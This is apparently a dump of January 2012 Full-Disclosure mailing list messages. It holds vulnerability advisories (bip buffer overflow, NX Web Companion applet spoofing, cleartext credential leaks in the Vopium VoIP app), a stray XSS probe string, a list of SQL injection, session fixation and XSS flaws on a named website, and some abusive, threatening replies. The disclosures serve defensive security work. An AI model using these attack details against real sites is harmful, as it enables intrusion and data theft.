scriptalert(vulnerability-lab)/script Risk: = 1.1 The security risk of the sql injection vulnerabilities are estimated as high(+). 1.2 The security risk of the persistent input validation vulnerability is estimated as medium(+). Credits: Vulnerability Laboratory Researcher - snup (snup@gmail.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA-2393-1] bip security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2393-1 secur...@debian.org http://www.debian.org/security/ dann frazier January 25, 2012 http://www.debian.org/security/faq - - Package: bip Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2012-0806 Debian Bug : 657217 Julien Tinnes reported a buffer overflow in the bip multiuser irc proxy which may allow arbitrary code execution by remote users. The oldstable distribution (lenny) is not affected by this problem. For the stable distribution (squeeze), this problem has been fixed in version 0.8.2-1squeeze4. For the testing distribution (wheezy) and the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your bip packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBAgAGBQJPICWGAAoJEBv4PF5U/IZAAEoP/iOr/SSzKlqTOt+UBuf/gTKi XFPJyj1oGqn4vmEltdxkjkLyEzV9t+dR9GswJLZr7OmYXMthF9+L8jQ8+27fu+lN ovVNQ27TYVYXCcAYqSGYlOXqM34Lelgiz4sjkbJ+1pr+lPlwUepNA1M0w7C2ZyZ1 JBDZegYWuDC7Y0GwerwJY5HWWntDxe13TrpgCcaeoo7GTQHeh2sHGdcWJsj1LfTa Dv8Im0tgCLhEsYCM/QWRV9eRZdBDzNTzfmbT7B22rMA/elKFFq6ZDn5P7YEVzPsV WIKpJorWSp0LP1lt/AzussOLqHXy2B5YXqpQGSsM+TLruKuOqSBvkZx5uRgBXVMA d8jMKCnofBtmV6AistiSE0bE/55nsVyvFG2w7Fmau69NnDZHzP+wM+oT1xi8CY7h GwHSOmx33Suan1ZPvxZqguRYyVU6dPvYfsal7qD+Tbiu0NqCI75xdjJZLPN1OLsr gtkQEjl6p9hPYBL47lcCpmJuy4JExIz9Qb2EF2y5h0Px0KnTaxehMgno0oslIllc DU1Fl+CluE2vF/XNgoPN8v83K0pPueaq9ODn03gshq8cqSUOrnd9ROGu7FncHrk/ qpDhcgAdoCOOY0fQEi+23Oyrq8npKvONxh0NKKkv1mf+sEG5U7Nn3qDtMNrMmTmf H5u7r6FWJveDt/AXwaV2 =LEek -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CFP: MobiPST 2012
We apologize if you received multiple copies of this CFP and we appreciate if you help to forward the CFP. The Second International Workshop on Privacy, Security and Trust in Mobile and Wireless Systems (MobiPST 2012) München, Germany, July 30 to August 2, 2012 Recently, mobile wireless devices, such as wireless sensors, smart tags, smart pads, tablets, PDAs and smart phones, have become pervasive and attracted significant interests from academia, industry, and standard organizations. With the support of latest cloud computing technology, these mobile wireless devices will play a more and more important role in computing and communication systems. When these devices become pervasive, security, privacy and trust become critical components for the acceptance of applications build based on these devices. Moreover, several favourable characteristics of mobile and wireless devices, including portability, mobility, and sensitivity, further impose the challenge of security and privacy in those systems. Despite recent advances, many research issues still remain in the design of secure, privacy-preserving, or trust architectures, protocols, algorithms, services, and applications on mobile and wireless systems. For example, when mobile devices have more storage space, high bandwidth, and super sensing capability, more sensitive information will be stored in those devices. On the other hand, operating systems running on those devices are not as powerful and reliable as those on traditional computers. Both OS layer and higher-level layer protocols are expected to enhance the security and preserve the privacy of those devices. With more mobile devices being used in social networks and traditional web-based systems, novel trust models are essential for new applications. New cryptographic algorithms, key distribution schemes and access control policies are also encouraged by considering the special characteristics of mobile and wireless devices. With more and more attacks reported to mobile devices in last two years, threat detection and protection tools are highly expected to improve the security. Other issues such as malware, cyber threat, attack modelling, security analysis, identity management, attack tolerance, security recovery and anonymity techniques also need to be revisited in these critical systems. Social Networks Smart Grid RFID-based Systems Mobile Cloud Cyber-Physical Systems Internet of Things Location-based Service Systems Wireless Local Area Networks Wireless Sensor Networks Wireless Mesh Networks Wireless Ad-hoc Networks Vehicular Networks Body-area Networks Cellular Networks Home Networks This workshop aims to bring together the technologists and researchers who share interests in the area of security, privacy and trust in mobile and wireless systems, as well as explore new venues of collaboration. The main purpose is to promote discussions of research and relevant activities in the models and designs of secure, privacy-preserving, or trust architectures, protocols, algorithms, services, and applications, as well as analysis on cyber threat in mobile and wireless systems. It also aims at increasing the synergy between academic and industry professionals working in this area. We plan to seek papers that address theoretical, experimental research, and work in-progress for security, privacy and trust related issues in the context of mobile and wireless systems that include, but are not limited to, the following Authors are invited to submit manuscripts reporting original unpublished research and recent developments in the topics related to the workshop. Submissions should include a title, abstract, keywords, author(s) and affiliation(s) with postal and e-mail address(es) of the corresponding author. Submitted manuscripts must be formatted in standard IEEE camera-ready format (double-column, 10-pt font) and must be submitted via EDAS ( http://edas.info/ ) as PDF files (formatted for 8.5x11-inch paper). The manuscripts should be no longer than 5 pages. One additional page is permitted if the authors are willing to pay an over-length charge at the time of publication (manuscripts should not exceed 6 pages). Submitted papers cannot have been previously published in or be under consideration for publication in another journal or conference. The workshop Program Committee reserves the right to not review papers that either exceed the length specification or have been submitted or published elsewhere. Submissions must include a title, abstract, keywords, author(s) and affiliation(s) with postal and e-mail address(es). All authors of a paper must be registered in the RIGHT order via EDAS at the SUBMISSION TIME and cannot be changed after the submission due time at EDAS. The paper title and author name list/order cannot be changed during the final camera-ready submission. The final program will be generated from EDAS automatically. A paper abstract
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Funny but no, this does not need a non-installed wordpress. 2012/1/25 Benji m...@b3nji.com Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes! On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote: On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
*UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Anonymous deletes CBS.com, solicits opinions on who to hack next
Anonymous deletes CBS.com, solicits opinions on who to hack nextsources form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/anonymous-deletes-cbs-com-solicits-opinions-on-who-to-hack-next/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
(CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NX Web Companion Spoofing Arbitrary Code Execution Vulnerability
# Vuln Title: NX Web Companion Spoofing Arbitrary Code Execution # Vulnerability # Date: 25.01.2012 # Author: otr # Software Link: http://www.nomachine.com/documents/plugin/install.php # Version: = 3.x # Tested on: Linux, Windows, Mac OS X x86, Mac OS X PPC, Solaris # CVE : None, yet Summary The No Machine NX Web Companion is a Java applet that allows to download and update the No Machine software from a server. The No Machine software is used to remotely access computers. The NX Web Companion is usually used by enterprises to easily deploy a cross platform client for accessing remote machines. Context For security purposes the NX Web Companion Java applet jar file is often code signed. Signed Java applets are allowed to run arbitrary code (outside of the Java sandbox) on the client system if the user confirms that he trusts the certificate the code was signed with. If a company decides to use the NX Web Companion it is likely to not only self-sign. Therefore it would get a CA signed certificate for the Web Companion. The defaults when accepting to such a signed Java applet are to accept to run the applet in question and trust the publisher forever. Meaning that any time the user browses to a page containg that applet, the applet code is executed automatically outside of the Java sandbox. The NX Web Companion spoofing vulnerability now, in the worst case, allows to execute arbitrary code on the client abusing the trust the user once placed into the signed jar file. Details The java applet nxapplet.jar downloads a file called client.zip from a location that can be controlled by the attacker using a fake web site using the parameters passed to the applet (SiteUrl, RedirectUrl). The applet can be tricked into thinking that a new version is available by modifing the *ClientVersion parameters. After user confirmation, the applets then downloads a file client.zip from the location provided in SiteUrl. client.zip is an archive that contains a platform dependend executable that is _not_ code signed and therefore may be manipulated by an attacker to run arbitrary code abusing the trust placed into the nxapplet.jar certificate. The client.zip file actually contains a file called client that is lzma compressed. The file client itself is a zip archive that contains the platform dependend executable which is called: For Windows: nxclient.exe For Linux: bin/nxclient For OS X: bin/nxclient.app/Contents/MacOS/ For Solaris: bin/nxclient Report Timeline 2011-12-12: Vendor Notification 2011-12-15: Vendor Response 2012-01-16: Vendor agrees to disclosure 2012-01-25: Public Disclosure -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
If we cared, we'd visit that site of our own volition. Secondly, even if we were interested: most of the people on these lists are intelligent enough not to click on links from spammers. Third, even if the content were interesting, even if this were the place for it and even if you hadn't spammed: pay and register is incentive enough for me *not* to join and * not* to ever visit that site again. Short version: this purpose of this list isn't for you to spam your new state-of-the-art website. Instead, it's typically to discuss/disclose issues/concepts related to computer/network security. Once in a while, there are discussions about the overflowing stupidity that some site owners/coders have. For example, people that stupidly (and blindly) inject code (e.g. for tracking purposes) into every single file on their site, regardless of extension: http://www.karmacyberintel.net/robots.txt Another one is blatantly disclosing paths in robots.txt that aren't even linked to and would never be found anyway (at least by bots that honor robots.txt, which ends up being the exact opposite of the desired effect). An example of how/why this can be a problem: md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3, if we perform a simple Google search - we can determine that you're likely running version 3.3.1 of Wordpress. From there, we have enough information to perform a targeted attack on your server. Except, we don't need to because you've already made it more than easy enough for us. Pretty much every single field on http://www.karmacyberintel.net/pay/ is vulnerable to SQL injection, which could easily allow anyone to completely compromise the database and possibly the entire site. On top of that, register.php also allows for session fixation attacks, as a result of header/cookie manipulation. If that weren't bad enough, the admin section for your karma theme is also vulnerable to cross-site scripting. Not to mention, all the problems with with how you've configured SSL and everything else. If you're going to spam, at least make sure the website you're spamming has been tested and determined to be *somewhat* secure. On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel karmacyberint...@gmail.com wrote: *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
Douchebags are all the same everywhere, even if you aren't Andrew Wallace, this does not make you not a douchebag. Sorry. Good luck with your packets! Andrew On 1/25/2012 4:24 PM, xD 0x41 wrote: stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peressheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anonymous deletes CBS.com, solicits opinions on who to hack next
Bandwidth bills. 2012/1/25 karma cyberintel karmacyberint...@gmail.com Anonymous deletes CBS.com, solicits opinions on who to hack nextsources form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/anonymous-deletes-cbs-com-solicits-opinions-on-who-to-hack-next/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
Anonymous is definitely not a group (as in a group that has actual members), you should know better. 2012/1/25 karma cyberintel karmacyberint...@gmail.com *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Those who try to manage potentially malicious servers do so over IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels. Feature or bug, vnc or ip kvm, the same behavior has a virtual box virtualized machine with shared clipboard. You can choose disabled, direction and bidirectional (by default) Something to keep in mind, at least the beginners like me. Just run in the guest and see your clipboard, sure there are more elegant ways of doing the same. (tested linux in linux with virtual box and linux in mac with vmware) while true; do xsel -p echo xsel -s echo xsel -b echo done Carlos Pantelides - http://seguridad-agile.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anonymous deletes CBS.com, solicits opinions on who to hack next
Reporting three day old news to Full-Disclosure. Awesome. On Wed, Jan 25, 2012 at 1:51 AM, karma cyberintel karmacyberint...@gmail.com wrote: Anonymous deletes CBS.com, solicits opinions on who to hack nextsources form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/anonymous-deletes-cbs-com-solicits-opinions-on-who-to-hack-next/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
+1 On 2012-01-25 12:17 PM, adam a...@papsy.net wrote: If we cared, we'd visit that site of our own volition. Secondly, even if we were interested: most of the people on these lists are intelligent enough not to click on links from spammers. Third, even if the content were interesting, even if this were the place for it and even if you hadn't spammed: pay and register is incentive enough for me *not* to join and * not* to ever visit that site again. Short version: this purpose of this list isn't for you to spam your new state-of-the-art website. Instead, it's typically to discuss/disclose issues/concepts related to computer/network security. Once in a while, there are discussions about the overflowing stupidity that some site owners/coders have. For example, people that stupidly (and blindly) inject code (e.g. for tracking purposes) into every single file on their site, regardless of extension: http://www.karmacyberintel.net/robots.txt Another one is blatantly disclosing paths in robots.txt that aren't even linked to and would never be found anyway (at least by bots that honor robots.txt, which ends up being the exact opposite of the desired effect). An example of how/why this can be a problem: md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3, if we perform a simple Google search - we can determine that you're likely running version 3.3.1 of Wordpress. From there, we have enough information to perform a targeted attack on your server. Except, we don't need to because you've already made it more than easy enough for us. Pretty much every single field on http://www.karmacyberintel.net/pay/ is vulnerable to SQL injection, which could easily allow anyone to completely compromise the database and possibly the entire site. On top of that, register.php also allows for session fixation attacks, as a result of header/cookie manipulation. If that weren't bad enough, the admin section for your karma theme is also vulnerable to cross-site scripting. Not to mention, all the problems with with how you've configured SSL and everything else. If you're going to spam, at least make sure the website you're spamming has been tested and determined to be *somewhat* secure. On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel karmacyberint...@gmail.com wrote: *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
I am pretty sure their host is gonna be suspending them after the DDoS that just hit them. (their real host that is, not the proxy. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vopium VoIP app is leaking login, password, IMEI, geolocation, and all your contacts in clear text
Hi Henry, I don't see a timeline. What was the vendor's response? Jeff On Fri, Jan 20, 2012 at 11:29 AM, Henry Paduwa henry.pad...@yahoo.fr wrote: Hi, I discovered that Vopium (http://vopium.com/), a popular VoIP app for Android and iPhone, is simply leaking in *clear text* : - your login - your IMEI (unique ID of your phone) - your password (not even hashed !) - your geolocation - and all your contacts ! Just use wireshark on your network and put http as filter. See capture extract below : FIND_YOUR_USERNAME_HERE - it will be your phone number Here the longitude, latitude, login and IMEI: GET /ge/index.php?ll=60.2345,9.1232username=FIND_YOUR_USERNAME_HEREimei=FIND_IMEI_HERE HTTP/1.1 Host: vopium.com User-Agent: Vopium3G/3.3 CFNetwork/548.0.4 Darwin/11.0.0 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate Cookie: __vc_lng=en [...] Here the login and password : POST /packagedetails.php?n=FIND_YOUR_USERNAME_HEREp=FIND_YOUR_PASSWORD_HERE HTTP/1.1 Host: vopium.com User-Agent: Vopium3G/3.3 CFNetwork/548.0.4 Darwin/11.0.0 Content-Length: 0 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate [...] And another one : GET /j/checkbalance.htm?username=FIND_YOUR_USERNAME_HEREpassword=FIND_YOUR_PASSWORD_HEREamountonly=y HTTP/1.1 Host: vopium.com User-Agent: Vopium3G/3.3 CFNetwork/548.0.4 Darwin/11.0.0 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate [...] And all your contacts : POST /oauthserver/synchservice HTTP/1.1 [...] username=FIND_YOUR_USERNAME_HEREpassword=FIND_YOUR_PASSWORD_HEREtype=setusercontacts=FIND_ALL_YOUR_CONTACTS_DATA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 25/01/2012 20:16, adam wrote: If we cared, we'd visit that site of our own volition. Secondly, even if we were interested: most of the people on these lists are intelligent enough not to click on links from spammers. Third, even if the content were interesting, even if this were the place for it and even if you hadn't spammed: pay and register is incentive enough for me *not* to join and * not* to ever visit that site again. Short version: this purpose of this list isn't for you to spam your new state-of-the-art website. Instead, it's typically to discuss/disclose issues/concepts related to computer/network security. Once in a while, there are discussions about the overflowing stupidity that some site owners/coders have. For example, people that stupidly (and blindly) inject code (e.g. for tracking purposes) into every single file on their site, regardless of extension: http://www.karmacyberintel.net/robots.txt Another one is blatantly disclosing paths in robots.txt that aren't even linked to and would never be found anyway (at least by bots that honor robots.txt, which ends up being the exact opposite of the desired effect). An example of how/why this can be a problem: md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3, if we perform a simple Google search - we can determine that you're likely running version 3.3.1 of Wordpress. From there, we have enough information to perform a targeted attack on your server. Except, we don't need to because you've already made it more than easy enough for us. Pretty much every single field on http://www.karmacyberintel.net/pay/ is vulnerable to SQL injection, which could easily allow anyone to completely compromise the database and possibly the entire site. On top of that, register.php also allows for session fixation attacks, as a result of header/cookie manipulation. If that weren't bad enough, the admin section for your karma theme is also vulnerable to cross-site scripting. Not to mention, all the problems with with how you've configured SSL and everything else. If you're going to spam, at least make sure the website you're spamming has been tested and determined to be *somewhat* secure. Thanks for the smile. If one is not certain that ones own house is not made of glass, it's best to not throw stones. D On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel karmacyberint...@gmail.com wrote: *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTyB/77Ivn8UFHWSmAQLoYAf8CbOtPVtl7nyo+ujnkf1qeWf7hGzjU5lJ xWr8kd/N37n50u3a6PXfy9p7TC+wQ2MNoJCZ6Y02sPZ6KxlUXXOC/K8iXigFK1yh rVrNaDLSR8+WgfOdskl7mYZXvHG7n2u8p3MNOll0D9MG1vn179P/oV3JXawSyHMZ EhhWPjjiJZfNwPhPBTQnQMhg3HoWYsJKrVR5CIu/EKiAPaS2xG7l+DojADZmPsIU B9BvSqLzJoVFUQ5zVF3KzPJLqIimqgH6HmK18Nmhs/kcBaxjVRL88XcfP1bYtl/Y kg22lkaRU5IIxDviy5ztxkBERKu7SyuBjcrE6B23rBia9xeCrloMdQ== =U0gT -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
